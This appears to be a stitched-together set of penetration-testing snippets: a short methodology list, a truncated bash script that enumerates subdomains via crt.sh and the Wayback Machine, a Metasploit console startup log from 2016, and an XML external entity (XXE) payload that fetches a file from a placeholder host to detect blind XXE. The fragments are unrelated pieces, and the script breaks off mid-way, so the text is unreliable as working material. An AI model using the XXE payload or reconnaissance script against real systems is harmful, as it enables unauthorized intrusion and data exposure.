- Recon
- Find vuln
- Exploit
- Document it
Unicornscans in cli, nmap in msfconsole to help store loot in database.
#!/bin/bash | |
#@cihanmehmet tweets, @cihanmehmets | |
if [[ $# -eq 0 ]] ; | |
then | |
echo "Usage: ./sub.sh findname2.com" | |
exit 1 | |
else | |
curl 'https://crt.sh/?q=%.'$1'&output=json' | jq '.[] | {name_value}' | sed 's/\"//g' | sed 's/\*\.//g' | sort -u |grep "name_value"|cut -d ' ' -f4 > $1.txt | |
curl -s "http://web.archive.org/cdx/search/cdx?url=*."$1"/*&output=text&fl=original&collapse=urlkey" |sort| sed -e 's_https*://__' -e "s/\/.*//" -e 's/:.*//' -e 's/^www\.//' | uniq >>$1.txt |
Script started on Sun 28 Aug 2016 04:19:27 PM CEST | |
[*] Starting the Metasploit Framework console.../ | |
[*] Starting the Metasploit Framework console...- | |
[*] Starting the Metasploit Framework console...\ | |
[*] starting the Metasploit Framework console...| | |
[*] STarting the Metasploit Framework console.../ | |
[*] StArting the Metasploit Framework console...- | |
[*] StaRting the Metasploit Framework console...\ | |
[*] StarTing the Metasploit Framework console...| |
-------------------------------------------------------------- | |
Vanilla, used to verify outbound xxe or blind xxe | |
-------------------------------------------------------------- | |
<?xml version="1.0" ?> | |
<!DOCTYPE r [ | |
<!ELEMENT r ANY > | |
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt"> | |
]> | |
<r>&sp;</r> |